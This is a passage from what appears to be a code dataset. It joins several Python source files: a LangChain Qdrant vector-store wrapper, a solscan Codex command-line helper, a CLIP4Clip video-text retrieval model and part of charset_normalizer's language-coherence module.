result, self.content_payload_key, self.metadata_payload_key
),
result.score,
)
for result in results
]
def max_marginal_relevance_search(
self, query: str, k: int = 4, fetch_k: int = 20
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
Returns:
List of Documents selected by maximal marginal relevance.
"""
embedding = self.embedding_function(query)
results = self.client.search(
collection_name=self.collection_name,
query_vector=embedding,
with_payload=True,
with_vectors=True,
limit=k,
)
embeddings = [result.vector for result in results]
mmr_selected = maximal_marginal_relevance(embedding, embeddings, k=k)
return [
self._document_from_scored_point(
results[i], self.content_payload_key, self.metadata_payload_key
)
for i in mmr_selected
]
@classmethod
def from_documents(
cls,
documents: List[Document],
embedding: Embeddings,
url: Optional[str] = None,
port: Optional[int] = 6333,
grpc_port: int = 6334,
prefer_grpc: bool = False,
https: Optional[bool] = None,
api_key: Optional[str] = None,
prefix: Optional[str] = None,
timeout: Optional[float] = None,
host: Optional[str] = None,
collection_name: Optional[str] = None,
distance_func: str = "Cosine",
content_payload_key: str = CONTENT_KEY,
metadata_payload_key: str = METADATA_KEY,
**kwargs: Any,
) -> "Qdrant":
return cast(
Qdrant,
super().from_documents(
documents,
embedding,
url=url,
port=port,
grpc_port=grpc_port,
prefer_grpc=prefer_grpc,
https=https,
api_key=api_key,
prefix=prefix,
timeout=timeout,
host=host,
collection_name=collection_name,
distance_func=distance_func,
content_payload_key=content_payload_key,
metadata_payload_key=metadata_payload_key,
**kwargs,
),
)
@classmethod
def from_texts(
cls,
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
url: Optional[str] = None,
port: Optional[int] = 6333,
grpc_port: int = 6334,
prefer_grpc: bool = False,
https: Optional[bool] = None,
api_key: Optional[str] = None,
prefix: Optional[str] = None,
timeout: Optional[float] = None,
host: Optional[str] = None,
collection_name: Optional[str] = None,
distance_func: str = "Cosine",
content_payload_key: str = CONTENT_KEY,
metadata_payload_key: str = METADATA_KEY,
**kwargs: Any,
) -> "Qdrant":
"""Construct Qdrant wrapper from raw documents.
Args:
texts: A list of texts to be indexed in Qdrant.
embedding: A subclass of `Embeddings`, responsible for text vectorization.
metadatas:
An optional list of metadata. If provided it has to be of the same
length as a list of texts.
url: either host or str of "Optional[scheme], host, Optional[port],
Optional[prefix]". Default: `None`
port: Port of the REST API interface. Default: 6333
grpc_port: Port of the gRPC interface. Default: 6334
prefer_grpc:
If `true` - use gPRC interface whenever possible in custom methods.
https: If `true` - use HTTPS(SSL) protocol. Default: `None`
api_key: API key for authentication in Qdrant Cloud. Default: `None`
prefix:
If not `None` - add `prefix` to the REST URL path.
Example: `service/v1` will result in
`http://localhost:6333/service/v1/{qdrant-endpoint}` for REST API.
Default: `None`
timeout:
Timeout for REST and gRPC API requests.
Default: 5.0 seconds for REST and unlimited for gRPC
host:
Host name of Qdrant service. If url and host are None, set to
'localhost'. Default: `None`
collection_name:
Name of the Qdrant collection to be used. If not provided,
will be created randomly.
distance_func:
Distance function. One of the: "Cosine" / "Euclid" / "Dot".
content_payload_key:
A payload key used to store the content of the document.
metadata_payload_key:
A payload key used to store the metadata of the document.
**kwargs:
Additional arguments passed directly into REST client initialization
This is a user friendly interface that:
1. Embeds documents.
2. Creates an in memory docstore
3. Initializes the Qdrant database
This is intended to be a quick way to get started.
Example:
.. code-block:: python
from langchain import Qdrant
from langchain.embeddings import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
qdrant = Qdrant.from_texts(texts, embeddings, "localhost")
"""
try:
import qdrant_client
except ImportError:
raise ValueError(
"Could not import qdrant-client python package. "
"Please install it with `pip install qdrant-client`."
)
from qdrant_client.http import models as rest
# Just do a single quick embedding to get vector size
partial_embeddings = embedding.embed_documents(texts[:1])
vector_size = len(partial_embeddings[0])
collection_name = collection_name or uuid.uuid4().hex
distance_func = distance_func.upper()
client = qdrant_client.QdrantClient(
url=url,
port=port,
grpc_port=grpc_port,
prefer_grpc=prefer_grpc,
https=https,
api_key=api_key,
prefix=prefix,
timeout=timeout,
host=host,
**kwargs,
)
client.recreate_collection(
collection_name=collection_name,
vectors_config=rest.VectorParams(
size=vector_size,
distance=rest.Distance[distance_func],
),
)
# Now generate the embeddings for all the texts
embeddings = embedding.embed_documents(texts)
client.upsert(
collection_name=collection_name,
points=rest.Batch(
ids=[uuid.uuid4().hex for _ in texts],
vectors=embeddings,
payloads=cls._build_payloads(
texts, metadatas, content_payload_key, metadata_payload_key
),
),
)
return cls(
client=client,
collection_name=collection_name,
embedding_function=embedding.embed_query,
content_payload_key=content_payload_key,
metadata_payload_key=metadata_payload_key,
)
@classmethod
def _build_payloads(
cls,
texts: Iterable[str],
metadatas: Optional[List[dict]],
content_payload_key: str,
metadata_payload_key: str,
) -> List[dict]:
payloads = []
for i, text in enumerate(texts):
if text is None:
raise ValueError(
"At least one of the texts is None. Please remove it before "
"calling .from_texts or .add_texts on Qdrant instance."
)
metadata = metadatas[i] if metadatas is not None else None
payloads.append(
{
content_payload_key: text,
metadata_payload_key: metadata,
}
)
return payloads
@classmethod
def _document_from_scored_point(
cls,
scored_point: Any,
content_payload_key: str,
metadata_payload_key: str,
) -> Document:
return Document(
page_content=scored_point.payload.get(content_payload_key),
metadata=scored_point.payload.get(metadata_payload_key) or {},
)
| [] |
2024-01-10 | khulnasoft-lab/solscan | solscan~utils~codex.py | import logging
import os
from argparse import ArgumentParser
from pathlib import Path
from solscan.utils.command_line import defaults_flag_in_config
logger = logging.getLogger("Solscan")
def init_parser(parser: ArgumentParser, always_enable_codex: bool = False) -> None:
"""
Init the cli arg with codex features
Args:
parser:
always_enable_codex (Optional(bool)): if true, --codex is not enabled
Returns:
"""
group_codex = parser.add_argument_group("Codex (https://beta.openai.com/docs/guides/code)")
if not always_enable_codex:
group_codex.add_argument(
"--codex",
help="Enable codex (require an OpenAI API Key)",
action="store_true",
default=defaults_flag_in_config["codex"],
)
group_codex.add_argument(
"--codex-log",
help="Log codex queries (in crytic_export/codex/)",
action="store_true",
default=False,
)
group_codex.add_argument(
"--codex-contracts",
help="Comma separated list of contracts to submit to OpenAI Codex",
action="store",
default=defaults_flag_in_config["codex_contracts"],
)
group_codex.add_argument(
"--codex-model",
help="Name of the Codex model to use (affects pricing). Defaults to 'text-davinci-003'",
action="store",
default=defaults_flag_in_config["codex_model"],
)
group_codex.add_argument(
"--codex-temperature",
help="Temperature to use with Codex. Lower number indicates a more precise answer while higher numbers return more creative answers. Defaults to 0",
action="store",
default=defaults_flag_in_config["codex_temperature"],
)
group_codex.add_argument(
"--codex-max-tokens",
help="Maximum amount of tokens to use on the response. This number plus the size of the prompt can be no larger than the limit (4097 for text-davinci-003)",
action="store",
default=defaults_flag_in_config["codex_max_tokens"],
)
group_codex.add_argument(
"--codex-organization",
help="Codex organization",
action="store",
default=None,
)
# TODO: investigate how to set the correct return type
# So that the other modules can work with openai
def openai_module(): # type: ignore
"""
Return the openai module
Consider checking the usage of open (solscan.codex_enabled) before using this function
Returns:
Optional[the openai module]
"""
try:
# pylint: disable=import-outside-toplevel
import openai
api_key = os.getenv("OPENAI_API_KEY")
if api_key is None:
logger.info(
"Please provide an Open API Key in OPENAI_API_KEY (https://beta.openai.com/account/api-keys)"
)
return None
openai.api_key = api_key
except ImportError:
logger.info("OpenAI was not installed") # type: ignore
logger.info('run "pip install openai"')
return None
return openai
def log_codex(filename: str, prompt: str) -> None:
"""
Log the prompt in crytic/export/codex/filename
Append to the file
Args:
filename: filename to write to
prompt: prompt to write
Returns:
None
"""
Path("crytic_export/codex").mkdir(parents=True, exist_ok=True)
with open(Path("crytic_export/codex", filename), "a", encoding="utf8") as file:
file.write(prompt)
file.write("\n")
| [] |
2024-01-10 | OpenGVLab/InternVideo | Downstream~Video-Text-Retrieval~modules~modeling_raw.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import torch
from torch import nn
import torch.nn.functional as F
from modules.until_module import PreTrainedModel, AllGather, CrossEn
from modules.module_cross import CrossModel, CrossConfig, Transformer as TransformerClip
from modules.module_clip import CLIP, convert_weights
from modules import clip_evl
from modules import clip_kc
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence
from ipdb import set_trace
logger = logging.getLogger(__name__)
allgather = AllGather.apply
class CLIP4ClipPreTrainedModel(PreTrainedModel, nn.Module):
""" An abstract class to handle weights initialization and
a simple interface for dowloading and loading pretrained models.
"""
def __init__(self, cross_config, *inputs, **kwargs):
super(CLIP4ClipPreTrainedModel, self).__init__(cross_config)
self.cross_config = cross_config
self.clip = None
self.cross = None
@classmethod
def from_pretrained(cls, cross_model_name, state_dict=None, cache_dir=None, type_vocab_size=2, *inputs, **kwargs):
task_config = None
if "task_config" in kwargs.keys():
task_config = kwargs["task_config"]
if not hasattr(task_config, "local_rank"):
task_config.__dict__["local_rank"] = 0
elif task_config.local_rank == -1:
task_config.local_rank = 0
if state_dict is None: state_dict = {}
pretrained_clip_name = "ViT-B/32"
if hasattr(task_config, 'pretrained_clip_name'):
pretrained_clip_name = task_config.pretrained_clip_name
clip_state_dict = CLIP.get_config(pretrained_clip_name=pretrained_clip_name)
for key, val in clip_state_dict.items():
new_key = "clip." + key
if new_key not in state_dict:
state_dict[new_key] = val.clone()
cross_config, _ = CrossConfig.get_config(cross_model_name, cache_dir, type_vocab_size, state_dict=None, task_config=task_config)
model = cls(cross_config, clip_state_dict, *inputs, **kwargs)
## ===> Initialization trick [HARD CODE]
if model.linear_patch == "3d":
contain_conv2 = False
for key in state_dict.keys():
if key.find("visual.conv2.weight") > -1:
contain_conv2 = True
break
if contain_conv2 is False and hasattr(model.clip.visual, "conv2"):
cp_weight = state_dict["clip.visual.conv1.weight"].clone()
kernel_size = model.clip.visual.conv2.weight.size(2)
conv2_size = model.clip.visual.conv2.weight.size()
conv2_size = list(conv2_size)
left_conv2_size = conv2_size.copy()
right_conv2_size = conv2_size.copy()
left_conv2_size[2] = (kernel_size - 1) // 2
right_conv2_size[2] = kernel_size - 1 - left_conv2_size[2]
left_zeros, right_zeros = None, None
if left_conv2_size[2] > 0:
left_zeros = torch.zeros(*tuple(left_conv2_size), dtype=cp_weight.dtype, device=cp_weight.device)
if right_conv2_size[2] > 0:
right_zeros = torch.zeros(*tuple(right_conv2_size), dtype=cp_weight.dtype, device=cp_weight.device)
cat_list = []
if left_zeros != None: cat_list.append(left_zeros)
cat_list.append(cp_weight.unsqueeze(2))
if right_zeros != None: cat_list.append(right_zeros)
cp_weight = torch.cat(cat_list, dim=2)
state_dict["clip.visual.conv2.weight"] = cp_weight
if model.sim_header == 'tightTransf':
contain_cross = False
for key in state_dict.keys():
if key.find("cross.transformer") > -1:
contain_cross = True
break
if contain_cross is False:
for key, val in clip_state_dict.items():
if key == "positional_embedding":
state_dict["cross.embeddings.position_embeddings.weight"] = val.clone()
continue
if key.find("transformer.resblocks") == 0:
num_layer = int(key.split(".")[2])
# cut from beginning
if num_layer < task_config.cross_num_hidden_layers:
state_dict["cross."+key] = val.clone()
continue
if model.sim_header == "seqLSTM" or model.sim_header == "seqTransf":
contain_frame_position = False
for key in state_dict.keys():
if key.find("frame_position_embeddings") > -1:
contain_frame_position = True
break
if contain_frame_position is False:
for key, val in clip_state_dict.items():
if key == "positional_embedding":
state_dict["frame_position_embeddings.weight"] = val.clone()
continue
if model.sim_header == "seqTransf" and key.find("transformer.resblocks") == 0:
num_layer = int(key.split(".")[2])
# cut from beginning
if num_layer < task_config.cross_num_hidden_layers:
state_dict[key.replace("transformer.", "transformerClip.")] = val.clone()
continue
## <=== End of initialization trick
if state_dict is not None:
model = cls.init_preweight(model, state_dict, task_config=task_config)
return model
def show_log(task_config, info):
if task_config is None or task_config.local_rank == 0:
logger.warning(info)
def update_attr(target_name, target_config, target_attr_name, source_config, source_attr_name, default_value=None):
if hasattr(source_config, source_attr_name):
if default_value is None or getattr(source_config, source_attr_name) != default_value:
setattr(target_config, target_attr_name, getattr(source_config, source_attr_name))
show_log(source_config, "Set {}.{}: {}.".format(target_name,
target_attr_name, getattr(target_config, target_attr_name)))
return target_config
def check_attr(target_name, task_config):
return hasattr(task_config, target_name) and task_config.__dict__[target_name]
class CLIP4Clip(CLIP4ClipPreTrainedModel):
def __init__(self, cross_config, clip_state_dict, task_config):
super(CLIP4Clip, self).__init__(cross_config)
self.task_config = task_config
self.ignore_video_index = -1
assert self.task_config.max_words + self.task_config.max_frames <= cross_config.max_position_embeddings
self._stage_one = True
self._stage_two = False
show_log(task_config, "Stage-One:{}, Stage-Two:{}".format(self._stage_one, self._stage_two))
self.loose_type = False
if self._stage_one and check_attr('loose_type', self.task_config):
self.loose_type = True
show_log(task_config, "Test retrieval by loose type.")
# CLIP Encoders: From OpenAI: CLIP [https://github.com/openai/CLIP] ===>
vit = "visual.proj" in clip_state_dict
assert vit
if vit:
vision_width = clip_state_dict["visual.conv1.weight"].shape[0]
vision_layers = len(
[k for k in clip_state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = clip_state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((clip_state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in clip_state_dict if k.startswith(f"visual.layer{b}"))) for b in
[1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = clip_state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((clip_state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == clip_state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = clip_state_dict["text_projection"].shape[1]
context_length = clip_state_dict["positional_embedding"].shape[0]
vocab_size = clip_state_dict["token_embedding.weight"].shape[0]
transformer_width = clip_state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in clip_state_dict if k.startswith(f"transformer.resblocks")))
show_log(task_config, "\t embed_dim: {}".format(embed_dim))
show_log(task_config, "\t image_resolution: {}".format(image_resolution))
show_log(task_config, "\t vision_layers: {}".format(vision_layers))
show_log(task_config, "\t vision_width: {}".format(vision_width))
show_log(task_config, "\t vision_patch_size: {}".format(vision_patch_size))
show_log(task_config, "\t context_length: {}".format(context_length))
show_log(task_config, "\t vocab_size: {}".format(vocab_size))
show_log(task_config, "\t transformer_width: {}".format(transformer_width))
show_log(task_config, "\t transformer_heads: {}".format(transformer_heads))
show_log(task_config, "\t transformer_layers: {}".format(transformer_layers))
self.linear_patch = '2d'
if hasattr(task_config, "linear_patch"):
self.linear_patch = task_config.linear_patch
show_log(task_config, "\t\t linear_patch: {}".format(self.linear_patch))
# use .float() to avoid overflow/underflow from fp16 weight. https://github.com/openai/CLIP/issues/40
cut_top_layer = 0
show_log(task_config, "\t cut_top_layer: {}".format(cut_top_layer))
self.clip = CLIP(
embed_dim,
image_resolution, vision_layers-cut_top_layer, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers-cut_top_layer,
linear_patch=self.linear_patch
).float()
for key in ["input_resolution", "context_length", "vocab_size"]:
if key in clip_state_dict:
del clip_state_dict[key]
convert_weights(self.clip)
# <=== End of CLIP Encoders
self.sim_header = 'meanP'
if hasattr(task_config, "sim_header"):
self.sim_header = task_config.sim_header
show_log(task_config, "\t sim_header: {}".format(self.sim_header))
if self.sim_header == "tightTransf": assert self.loose_type is False
cross_config.max_position_embeddings = context_length
if self.loose_type is False:
# Cross Encoder ===>
cross_config = update_attr("cross_config", cross_config, "num_hidden_layers", self.task_config, "cross_num_hidden_layers")
self.cross = CrossModel(cross_config)
# <=== End of Cross Encoder
self.similarity_dense = nn.Linear(cross_config.hidden_size, 1)
if self.sim_header == "seqLSTM" or self.sim_header == "seqTransf":
self.frame_position_embeddings = nn.Embedding(cross_config.max_position_embeddings, cross_config.hidden_size)
if self.sim_header == "seqTransf":
self.transformerClip = TransformerClip(width=transformer_width, layers=self.task_config.cross_num_hidden_layers,
heads=transformer_heads, )
if self.sim_header == "seqLSTM":
self.lstm_visual = nn.LSTM(input_size=cross_config.hidden_size, hidden_size=cross_config.hidden_size,
batch_first=True, bidirectional=False, num_layers=1)
self.loss_fct = CrossEn()
self.apply(self.init_weights)
def forward(self, input_ids, token_type_ids, attention_mask, video, video_mask=None):
input_ids = input_ids.view(-1, input_ids.shape[-1])
token_type_ids = token_type_ids.view(-1, token_type_ids.shape[-1])
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
video_mask = video_mask.view(-1, video_mask.shape[-1])
# T x 3 x H x W
video = torch.as_tensor(video).float()
b, pair, bs, ts, channel, h, w = video.shape
video = video.view(b * pair * bs * ts, channel, h, w)
video_frame = bs * ts
sequence_output, visual_output = self.get_sequence_visual_output(input_ids, token_type_ids, attention_mask,
video, video_mask, shaped=True, video_frame=video_frame)
if self.training:
loss = 0.
sim_matrix, *_tmp = self.get_similarity_logits(sequence_output, visual_output, attention_mask, video_mask,
shaped=True, loose_type=self.loose_type)
sim_loss1 = self.loss_fct(sim_matrix)
sim_loss2 = self.loss_fct(sim_matrix.T)
sim_loss = (sim_loss1 + sim_loss2) / 2
loss += sim_loss
return loss
else:
return None
def get_sequence_output(self, input_ids, token_type_ids, attention_mask, shaped=False):
if shaped is False:
input_ids = input_ids.view(-1, input_ids.shape[-1])
token_type_ids = token_type_ids.view(-1, token_type_ids.shape[-1])
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
bs_pair = input_ids.size(0)
sequence_hidden = self.clip.encode_text(input_ids).float()
sequence_hidden = sequence_hidden.view(bs_pair, -1, sequence_hidden.size(-1))
return sequence_hidden
def get_visual_output(self, video, video_mask, shaped=False, video_frame=-1):
if shaped is False:
video_mask = video_mask.view(-1, video_mask.shape[-1])
video = torch.as_tensor(video).float()
b, pair, bs, ts, channel, h, w = video.shape
video = video.view(b * pair * bs * ts, channel, h, w)
video_frame = bs * ts
bs_pair = video_mask.size(0)
visual_hidden = self.clip.encode_image(video, video_frame=video_frame).float()
visual_hidden = visual_hidden.view(bs_pair, -1, visual_hidden.size(-1))
return visual_hidden
def get_sequence_visual_output(self, input_ids, token_type_ids, attention_mask, video, video_mask, shaped=False, video_frame=-1):
if shaped is False:
input_ids = input_ids.view(-1, input_ids.shape[-1])
token_type_ids = token_type_ids.view(-1, token_type_ids.shape[-1])
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
video_mask = video_mask.view(-1, video_mask.shape[-1])
video = torch.as_tensor(video).float()
b, pair, bs, ts, channel, h, w = video.shape
video = video.view(b * pair * bs * ts, channel, h, w)
video_frame = bs * ts
sequence_output = self.get_sequence_output(input_ids, token_type_ids, attention_mask, shaped=True)
visual_output = self.get_visual_output(video, video_mask, shaped=True, video_frame=video_frame)
return sequence_output, visual_output
def _get_cross_output(self, sequence_output, visual_output, attention_mask, video_mask):
concat_features = torch.cat((sequence_output, visual_output), dim=1) # concatnate tokens and frames
concat_mask = torch.cat((attention_mask, video_mask), dim=1)
text_type_ = torch.zeros_like(attention_mask)
video_type_ = torch.ones_like(video_mask)
concat_type = torch.cat((text_type_, video_type_), dim=1)
cross_layers, pooled_output = self.cross(concat_features, concat_type, concat_mask, output_all_encoded_layers=True)
cross_output = cross_layers[-1]
return cross_output, pooled_output, concat_mask
def _mean_pooling_for_similarity_sequence(self, sequence_output, attention_mask):
attention_mask_un = attention_mask.to(dtype=torch.float).unsqueeze(-1)
attention_mask_un[:, 0, :] = 0.
sequence_output = sequence_output * attention_mask_un
text_out = torch.sum(sequence_output, dim=1) / torch.sum(attention_mask_un, dim=1, dtype=torch.float)
return text_out
def _mean_pooling_for_similarity_visual(self, visual_output, video_mask,):
video_mask_un = video_mask.to(dtype=torch.float).unsqueeze(-1)
visual_output = visual_output * video_mask_un
video_mask_un_sum = torch.sum(video_mask_un, dim=1, dtype=torch.float)
video_mask_un_sum[video_mask_un_sum == 0.] = 1.
video_out = torch.sum(visual_output, dim=1) / video_mask_un_sum
return video_out
def _mean_pooling_for_similarity(self, sequence_output, visual_output, attention_mask, video_mask,):
text_out = self._mean_pooling_for_similarity_sequence(sequence_output, attention_mask)
video_out = self._mean_pooling_for_similarity_visual(visual_output, video_mask)
return text_out, video_out
def _loose_similarity(self, sequence_output, visual_output, attention_mask, video_mask, sim_header="meanP"):
sequence_output, visual_output = sequence_output.contiguous(), visual_output.contiguous()
if sim_header == "meanP":
# Default: Parameter-free type
pass
elif sim_header == "seqLSTM":
# Sequential type: LSTM
visual_output_original = visual_output
visual_output = pack_padded_sequence(visual_output, torch.sum(video_mask, dim=-1).cpu(),
batch_first=True, enforce_sorted=False)
visual_output, _ = self.lstm_visual(visual_output)
if self.training: self.lstm_visual.flatten_parameters()
visual_output, _ = pad_packed_sequence(visual_output, batch_first=True)
visual_output = torch.cat((visual_output, visual_output_original[:, visual_output.size(1):, ...].contiguous()), dim=1)
visual_output = visual_output + visual_output_original
elif sim_header == "seqTransf":
# Sequential type: Transformer Encoder
visual_output_original = visual_output
seq_length = visual_output.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=visual_output.device)
position_ids = position_ids.unsqueeze(0).expand(visual_output.size(0), -1)
frame_position_embeddings = self.frame_position_embeddings(position_ids)
visual_output = visual_output + frame_position_embeddings
extended_video_mask = (1.0 - video_mask.unsqueeze(1)) * -1000000.0
extended_video_mask = extended_video_mask.expand(-1, video_mask.size(1), -1)
visual_output = visual_output.permute(1, 0, 2) # NLD -> LND
visual_output = self.transformerClip(visual_output, extended_video_mask)
visual_output = visual_output.permute(1, 0, 2) # LND -> NLD
visual_output = visual_output + visual_output_original
if self.training:
visual_output = allgather(visual_output, self.task_config)
video_mask = allgather(video_mask, self.task_config)
sequence_output = allgather(sequence_output, self.task_config)
torch.distributed.barrier()
visual_output = visual_output / visual_output.norm(dim=-1, keepdim=True)
visual_output = self._mean_pooling_for_similarity_visual(visual_output, video_mask)
visual_output = visual_output / visual_output.norm(dim=-1, keepdim=True)
sequence_output = sequence_output.squeeze(1)
sequence_output = sequence_output / sequence_output.norm(dim=-1, keepdim=True)
logit_scale = self.clip.logit_scale.exp()
retrieve_logits = logit_scale * torch.matmul(sequence_output, visual_output.t())
return retrieve_logits
def _cross_similarity(self, sequence_output, visual_output, attention_mask, video_mask):
sequence_output, visual_output = sequence_output.contiguous(), visual_output.contiguous()
b_text, s_text, h_text = sequence_output.size()
b_visual, s_visual, h_visual = visual_output.size()
retrieve_logits_list = []
step_size = b_text # set smaller to reduce memory cost
split_size = [step_size] * (b_text // step_size)
release_size = b_text - sum(split_size)
if release_size > 0:
split_size += [release_size]
# due to clip text branch retrun the last hidden
attention_mask = torch.ones(sequence_output.size(0), 1)\
.to(device=attention_mask.device, dtype=attention_mask.dtype)
sequence_output_splits = torch.split(sequence_output, split_size, dim=0)
attention_mask_splits = torch.split(attention_mask, split_size, dim=0)
for i in range(len(split_size)):
sequence_output_row = sequence_output_splits[i]
attention_mask_row = attention_mask_splits[i]
sequence_output_l = sequence_output_row.unsqueeze(1).repeat(1, b_visual, 1, 1)
sequence_output_l = sequence_output_l.view(-1, s_text, h_text)
attention_mask_l = attention_mask_row.unsqueeze(1).repeat(1, b_visual, 1)
attention_mask_l = attention_mask_l.view(-1, s_text)
step_truth = sequence_output_row.size(0)
visual_output_r = visual_output.unsqueeze(0).repeat(step_truth, 1, 1, 1)
visual_output_r = visual_output_r.view(-1, s_visual, h_visual)
video_mask_r = video_mask.unsqueeze(0).repeat(step_truth, 1, 1)
video_mask_r = video_mask_r.view(-1, s_visual)
cross_output, pooled_output, concat_mask = \
self._get_cross_output(sequence_output_l, visual_output_r, attention_mask_l, video_mask_r)
retrieve_logits_row = self.similarity_dense(pooled_output).squeeze(-1).view(step_truth, b_visual)
retrieve_logits_list.append(retrieve_logits_row)
retrieve_logits = torch.cat(retrieve_logits_list, dim=0)
return retrieve_logits
def get_similarity_logits(self, sequence_output, visual_output, attention_mask, video_mask, shaped=False, loose_type=False):
if shaped is False:
attention_mask = attention_mask.view(-1, attention_mask.shape[-1])
video_mask = video_mask.view(-1, video_mask.shape[-1])
contrastive_direction = ()
if loose_type:
assert self.sim_header in ["meanP", "seqLSTM", "seqTransf"]
retrieve_logits = self._loose_similarity(sequence_output, visual_output, attention_mask, video_mask, sim_header=self.sim_header)
else:
assert self.sim_header in ["tightTransf"]
retrieve_logits = self._cross_similarity(sequence_output, visual_output, attention_mask, video_mask, )
return retrieve_logits, contrastive_direction | [] |
2024-01-10 | thomas-yanxin/Smart_container | Smart_container~venv~Lib~site-packages~charset_normalizer~cd.py | import importlib
from codecs import IncrementalDecoder
from collections import Counter
from functools import lru_cache
from typing import Dict, List, Optional, Set, Tuple
from .assets import FREQUENCIES
from .md import is_suspiciously_successive_range
from .models import CoherenceMatches
from .utils import is_multi_byte_encoding, is_unicode_range_secondary, unicode_range
def encoding_unicode_range(iana_name: str) -> List[str]:
"""
Return associated unicode ranges in a single byte code page.
"""
if is_multi_byte_encoding(iana_name):
raise IOError("Function not supported on multi-byte code page")
decoder = importlib.import_module("encodings.{}".format(iana_name)).IncrementalDecoder # type: ignore
p = decoder(errors="ignore") # type: IncrementalDecoder
seen_ranges = set() # type: Set[str]
for i in range(48, 255):
chunk = p.decode(bytes([i])) # type: str
if chunk:
character_range = unicode_range(chunk) # type: Optional[str]
if character_range is None:
continue
if is_unicode_range_secondary(character_range) is False:
seen_ranges.add(character_range)
return sorted(list(seen_ranges))
def unicode_range_languages(primary_range: str) -> List[str]:
"""
Return inferred languages used with a unicode range.
"""
languages = [] # type: List[str]
for language, characters in FREQUENCIES.items():
for character in characters:
if unicode_range(character) == primary_range:
languages.append(language)
break
return languages
@lru_cache()
def encoding_languages(iana_name: str) -> List[str]:
"""
Single-byte encoding language association. Some code page are heavily linked to particular language(s).
This function does the correspondence.
"""
unicode_ranges = encoding_unicode_range(iana_name) # type: List[str]
primary_range = None # type: Optional[str]
for specified_range in unicode_ranges:
if "Latin" not in specified_range:
primary_range = specified_range
break
if primary_range is None:
return ["Latin Based"]
return unicode_range_languages(primary_range)
def mb_encoding_languages(iana_name: str) -> List[str]:
"""
Multi-byte encoding language association. Some code page are heavily linked to particular language(s).
This function does the correspondence.
"""
if (
iana_name.startswith("shift_")
or iana_name.startswith("iso2022_jp")
or iana_name.startswith("euc_j")
or iana_name in {"cp932"}
):
return ["Japanese"]
if iana_name.startswith("gb") or iana_name in {"big5", "cp950", "big5hkscs"}:
return ["Chinese", "Classical Chinese"]
if iana_name.startswith("iso2022_kr") or iana_name in {"johab", "cp949", "euc_kr"}:
return ["Korean"]
return []
def alphabet_languages(characters: List[str]) -> List[str]:
"""
Return associated languages associated to given characters.
"""
languages = [] # type: List[str]
for language, language_characters in FREQUENCIES.items():
character_match_count = 0 # type: int
character_count = len(language_characters) # type: int
for character in language_characters:
if character in characters:
character_match_count += 1
if character_match_count / character_count >= 0.2:
languages.append(language)
return languages
def characters_popularity_compare(
language: str, ordered_characters: List[str]
) -> float:
"""
Determine if a ordered characters list (by occurrence from most appearance to rarest) match a particular language.
The result is a ratio between 0. (absolutely no correspondence) and 1. (near perfect fit).
Beware that is function is not strict on the match in order to ease the detection. (Meaning close match is 1.)
"""
if language not in FREQUENCIES:
raise ValueError("{} not available".format(language))
character_approved_count = 0 # type: int
for character in ordered_characters:
if character not in FREQUENCIES[language]:
continue
characters_before_source = FREQUENCIES[language][
0 : FREQUENCIES[language].index(character)
] # type: List[str]
characters_after_source = FREQUENCIES[language][
FREQUENCIES[language].index(character) :
] # type: List[str]
characters_before = ordered_characters[
0 : ordered_characters.index(character)
] # type: List[str]
characters_after = ordered_characters[
ordered_characters.index(character) :
] # type: List[str]
before_match_count = [
e in characters_before for e in characters_before_source
].count(
True
) # type: int
after_match_count = [
e in characters_after for e in characters_after_source
].count(
True
) # type: int
if len(characters_before_source) == 0 and before_match_count <= 4:
character_approved_count += 1
continue
if len(characters_after_source) == 0 and after_match_count <= 4:
character_approved_count += 1
continue
if (
before_match_count / len(characters_before_source) >= 0.4
or after_match_count / len(characters_after_source) >= 0.4
):
character_approved_count += 1
continue
return character_approved_count / len(ordered_characters)
def alpha_unicode_split(decoded_sequence: str) -> List[str]:
"""
Given a decoded text sequence, return a list of str. Unicode range / alphabet separation.
Ex. a text containing English/Latin with a bit a Hebrew will return two items in the resulting list;
One containing the latin letters and the other hebrew.
"""
layers = {} # type: Dict[str, str]
for character in decoded_sequence:
if character.isalpha() is False:
continue
character_range = unicode_range(character) # type: Optional[str]
if character_range is None:
continue
layer_target_range = None # type: Optional[str]
for discovered_range in layers:
if (
is_suspiciously_successive_range(discovered_range, character_range)
is False
):
layer_target_range = discovered_range
break
if layer_target_range is None:
layer_target_range = character_range
if layer_target_range not in layers:
layers[layer_target_range] = character.lower()
continue
layers[layer_target_range] += character.lower()
return list(layers.values())
def merge_coherence_ratios(results: List[CoherenceMatches]) -> CoherenceMatches:
"""
This function merge results previously given by the function coherence_ratio.
The return type is the same as coherence_ratio.
"""
per_language_ratios = {} # type: Dict[str, List[float]]
merge = [] # type: CoherenceMatches
for result in results:
for sub_result in result:
language, ratio = sub_result
if language not in per_language_ratios:
per_language_ratios[language] = [ratio]
continue
per_language_ratios[language].append(ratio)
for language in per_language_ratios:
merge.append(
(
language,
round(
sum(per_language_ratios[language])
/ len(per_language_ratios[language]),
4,
),
)
)
return sorted(merge, key=lambda x: x[1], reverse=True)
@lru_cache(maxsize=2048)
def coherence_ratio(
